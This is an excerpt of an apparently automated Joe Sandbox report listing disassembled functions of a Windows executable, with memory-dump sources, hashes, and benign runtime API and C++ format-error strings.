                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 916656526-0
                                                                                                                                • Opcode ID: 363b13cd13292692d1c61b538679360b75d07f7f896774e1709401d34f828179
                                                                                                                                • Instruction ID: 61bcfd4328e0bd4b579b752b0e8903a7ed160282bbddbc42336832dde2aca4da
                                                                                                                                • Opcode Fuzzy Hash: 363b13cd13292692d1c61b538679360b75d07f7f896774e1709401d34f828179
                                                                                                                                • Instruction Fuzzy Hash: FF41CB21B09A8341FA707A16642377BE280BF8A7A0F945539DF5D47B85DEBDE40DC620
                                                                                                                                Function 00007FF712781B34 Relevance: 1.3, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: EnumSystemLocalesEx
                                                                                                                                • API String ID: 0-2492367753
                                                                                                                                • Opcode ID: 35bdf124aaf4b764a7812ea1193877913142bbf88e4e07ea7362529dcc8a4302
                                                                                                                                • Instruction ID: 28682309cbb4eba7a67b60fcb3cb56313fd4b47032bc5fecfaaef764d20d433d
                                                                                                                                • Opcode Fuzzy Hash: 35bdf124aaf4b764a7812ea1193877913142bbf88e4e07ea7362529dcc8a4302
                                                                                                                                • Instruction Fuzzy Hash: 7B114232908B4682DB40AB14F4411ABB760FB89BB0F940636EBAD13799DF7CD50DC750
                                                                                                                                Function 00007FF712789F50 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HeapProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 54951025-0
                                                                                                                                • Opcode ID: d8f25222e87142558990d685c60b38861d8dc2d19380d858a307dfffbb70efbd
                                                                                                                                • Instruction ID: b98007ea823a313bbd0d95ef14b77e433a1595cece4479e24e843db31ceff4fd
                                                                                                                                • Opcode Fuzzy Hash: d8f25222e87142558990d685c60b38861d8dc2d19380d858a307dfffbb70efbd
                                                                                                                                • Instruction Fuzzy Hash: E8B09220E0BF02C6EB883B216C8221562A4BF59730FE84478C20CC1320DE6C20BE8721
                                                                                                                                Function 00007FF712769B20 Relevance: .5, Instructions: 474COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7e4577c5fcecb0c9a1be16a3a773629e110347d21e5efe9c78e0ebf41f7c2b80
                                                                                                                                • Instruction ID: 0cc349804c29f68ce380b891ae71843c0e6d72b1054f2eff6d9a34181340e681
                                                                                                                                • Opcode Fuzzy Hash: 7e4577c5fcecb0c9a1be16a3a773629e110347d21e5efe9c78e0ebf41f7c2b80
                                                                                                                                • Instruction Fuzzy Hash: E6025A22B18B4686FB186F16D5103BAE6A1FB5ABD0F844035DF0E53B94DABCE84CC714
                                                                                                                                Function 00007FF712762FD0 Relevance: .4, Instructions: 442COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3729c8e9f127567df776f5c11c740d259bfa1b7942e84c25e3ccd376b0abd754
                                                                                                                                • Instruction ID: 41a92b7ab81bf50be206a5cbc75155788447484a748dd445072cf24389e22282
                                                                                                                                • Opcode Fuzzy Hash: 3729c8e9f127567df776f5c11c740d259bfa1b7942e84c25e3ccd376b0abd754
                                                                                                                                • Instruction Fuzzy Hash: 04D17191F04B9907EE199B2BE4116BAA690B799FC0FC45035EF0E93B60DA7CE50DC704
                                                                                                                                Function 00007FF712762A50 Relevance: .4, Instructions: 428COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5cf5040716e9b8b9c9d1641f8736891d7b4baf006e6230020532f48f2590016f
                                                                                                                                • Instruction ID: 5fb05df9e9a79ccd690b845b6278f47c6c47a53ffe3b7a691bb330d7bd0de31e
                                                                                                                                • Opcode Fuzzy Hash: 5cf5040716e9b8b9c9d1641f8736891d7b4baf006e6230020532f48f2590016f
                                                                                                                                • Instruction Fuzzy Hash: E2D16C32F089560BF7A8991EA441A79E695F7DD790F445035DF0A83BE0EBB9E84DC700
                                                                                                                                Function 00007FF71277D7D8 Relevance: .3, Instructions: 310COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: NameTranslate$CodePageValid_invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4003095782-0
                                                                                                                                • Opcode ID: a8763cc3a29275fcb9126793b8c741084e0bb922defca1e244c281ecfc7efa45
                                                                                                                                • Instruction ID: 83177e69b263918089724046786cc4bd4d11561fa5e8ef17ccb0dd26e83f1100
                                                                                                                                • Opcode Fuzzy Hash: a8763cc3a29275fcb9126793b8c741084e0bb922defca1e244c281ecfc7efa45
                                                                                                                                • Instruction Fuzzy Hash: 64C1D936A08A8245EB60BB6198153FBA7A1FB9A7A8FC04031DF4D47695EFBCD54CC710
                                                                                                                                Function 00007FF712788BFC Relevance: .3, Instructions: 268COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                • Opcode ID: b842490b0cd483715218479af860fffd1e144df4892b98c5c91f5a8f38a7f2b1
                                                                                                                                • Instruction ID: 1f795cb555cb4c8166c46831a8ace58c42977ecc8cd31fb9a0a26385c017ae7f
                                                                                                                                • Opcode Fuzzy Hash: b842490b0cd483715218479af860fffd1e144df4892b98c5c91f5a8f38a7f2b1
                                                                                                                                • Instruction Fuzzy Hash: 83B10A32A09A4A85EB24EF21E4026BB6390FB5EB64F844231DB1D936C9DFBCD55DC350
                                                                                                                                Function 00007FF712771790 Relevance: .3, Instructions: 258COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d8cb145516a566238386028892f78ab8123acdcbd54ebb39f3adafc916c80b42
                                                                                                                                • Instruction ID: 3656d93c84246cb9817a3c96d01b211573eb330a08709d0d78e44ef22772c544
                                                                                                                                • Opcode Fuzzy Hash: d8cb145516a566238386028892f78ab8123acdcbd54ebb39f3adafc916c80b42
                                                                                                                                • Instruction Fuzzy Hash: 73A11762E09E4286FB207645E41D7BAB392EB0ABF0F954131CB5D177C0DAACE54DC724
                                                                                                                                Function 00007FF71278A694 Relevance: .2, Instructions: 183COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                • Opcode ID: 180d2ca3f1c66e804f871d40a534d4028a4c5551bcbd0bf3d4cafcb61f832d7f
                                                                                                                                • Instruction ID: 242bc8ab72789a2cba2dd0d7571a3612560fe003ac72d2a57c295c1bddfa1ae5
                                                                                                                                • Opcode Fuzzy Hash: 180d2ca3f1c66e804f871d40a534d4028a4c5551bcbd0bf3d4cafcb61f832d7f
                                                                                                                                • Instruction Fuzzy Hash: 2F611922F1CA8242FB65BA28845723BE690AF5A770F944235D71D426C0EEFDE84DD770
                                                                                                                                Function 00007FF71277EADC Relevance: .1, Instructions: 125COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 485612231-0
                                                                                                                                • Opcode ID: 47c38df5d6474a567221756392725a8aab29c96142c372e4f07794d707facf3a
                                                                                                                                • Instruction ID: 20213d4d95857a3d0a7286e08f10b662afe6df1ad9215bfae504e58f760c8e56
                                                                                                                                • Opcode Fuzzy Hash: 47c38df5d6474a567221756392725a8aab29c96142c372e4f07794d707facf3a
                                                                                                                                • Instruction Fuzzy Hash: 7641D162714E5482EF04EF6AD95556AB3A1BB4CFE0B899436EE0D87B58EF7CC449C300
                                                                                                                                Function 00007FF71278BC80 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ee9d8701c4559a96a2b78598a9406ef8228f58c35998c053563f007e2a60e84d
                                                                                                                                • Instruction ID: 91690cf08e360b810d4c4a9abde449d79788d8d33ad6f1e475b7cc7c4dbfce2e
                                                                                                                                • Opcode Fuzzy Hash: ee9d8701c4559a96a2b78598a9406ef8228f58c35998c053563f007e2a60e84d
                                                                                                                                • Instruction Fuzzy Hash: 6011ECB1A1DA4286F7595F29D812336B790E7093A0FC05038C64DC6AC4DEBCE0B8CB14
                                                                                                                                Function 00007FF7127745DC Relevance: .0, Instructions: 2COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a43eee0a0e0dafd9d44171dd9d715379e67ae08465fe1814d4149b06a77bbbb5
                                                                                                                                • Instruction ID: ff45e1f4b74da7bde042d190fa03b70a03364ad4c58f7eb249f89c1e9af6e5d1
                                                                                                                                • Opcode Fuzzy Hash: a43eee0a0e0dafd9d44171dd9d715379e67ae08465fe1814d4149b06a77bbbb5
                                                                                                                                • Instruction Fuzzy Hash: BCA0022590CC2AD5E615BB41E865532A334FB5B320FE04C31D60D450609FBCE40CC734
                                                                                                                                Function 00007FF71276C870 Relevance: 35.0, APIs: 10, Strings: 10, Instructions: 48COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for bool$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type for wchar_t$Invalid presentation type specifier$Invalid type specification.$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                • API String ID: 909987262-1539746584
                                                                                                                                • Opcode ID: 964d25ab59281f64e11bbcd1139ce3b93a53a0ffd05dec3cf696dc095f9e5b61
                                                                                                                                • Instruction ID: 50cb26e46689d3e822fa34b12df07b65fed31d0438baeed0039b41127e2ae0f8
                                                                                                                                • Opcode Fuzzy Hash: 964d25ab59281f64e11bbcd1139ce3b93a53a0ffd05dec3cf696dc095f9e5b61
                                                                                                                                • Instruction Fuzzy Hash: 1011EC61A18D4796F605F714E8951BBE260AFBAB20FD11431E31D429B3DDACB60CC324
                                                                                                                                Function 00007FF71276C8FB Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 57COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for bool$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type for wchar_t$Invalid presentation type specifier$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                • API String ID: 909987262-2353063124
                                                                                                                                • Opcode ID: 19a2c3cc1f45e6dfe5b2a71edc73c991534fc9ef6690a7e85d2ecf679f2f357b
                                                                                                                                • Instruction ID: d4f5cfb08c519baafd60805e3c984efc145f059b6bf4b57eb393c99704572850
                                                                                                                                • Opcode Fuzzy Hash: 19a2c3cc1f45e6dfe5b2a71edc73c991534fc9ef6690a7e85d2ecf679f2f357b
                                                                                                                                • Instruction Fuzzy Hash: 72213E61E18D4395FA65B714E8993B7F2909FABB20FE40036D30D418F29DADB94CC729
                                                                                                                                Function 00007FF71276C91B Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 55COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type for wchar_t$Invalid presentation type specifier$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                • API String ID: 0-1908750780
                                                                                                                                • Opcode ID: 7670998868b1cfb22fd98583ba87f95daf6a5e8138f39bd3f72a33643366dcdc
                                                                                                                                • Instruction ID: 72045433ac7635f5ffa6b5f5e6dd1a200e2f70f9f7b6cb4cadb829c0609e7168
                                                                                                                                • Opcode Fuzzy Hash: 7670998868b1cfb22fd98583ba87f95daf6a5e8138f39bd3f72a33643366dcdc
                                                                                                                                • Instruction Fuzzy Hash: 6D113E61E1CD0395FA65B714E89937BF2909FABB20FE40036D30D019E28DADB94CC729
                                                                                                                                Function 00007FF71276C938 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 52COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type specifier$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                • API String ID: 0-3031533609
                                                                                                                                • Opcode ID: a6ae82777fb9e33c2b6c67835399a2f79ad1d4a790dd7c16858ad9cb1f7fe272
                                                                                                                                • Instruction ID: 3d990fe758321c12e6830d2ead25d6811d2c49de412e1bbc21b37832bc8b6bb8
                                                                                                                                • Opcode Fuzzy Hash: a6ae82777fb9e33c2b6c67835399a2f79ad1d4a790dd7c16858ad9cb1f7fe272
                                                                                                                                • Instruction Fuzzy Hash: 39111A61E18D4295FA65B714D4993BBF2909FABB20FE40036D30C019A28DADB98CC769
                                                                                                                                Function 00007FF71276C5B0 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 196COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Format specifier requires numeric argument.$Format specifier requires numeric or pointer argument.$Invalid format string.$Missing precision specifier.$Number is too big$Precision not allowed for this argument type.
                                                                                                                                • API String ID: 909987262-255851600
                                                                                                                                • Opcode ID: fefc6c2b101d73601fd85839d3f277ca3947819604e1f5ff3019ea7ec551d7c0
                                                                                                                                • Instruction ID: a55a19a7bc3d9619b000d1dbda5f703e04eac98ee65204c09ff0eada1e419522
                                                                                                                                • Opcode Fuzzy Hash: fefc6c2b101d73601fd85839d3f277ca3947819604e1f5ff3019ea7ec551d7c0
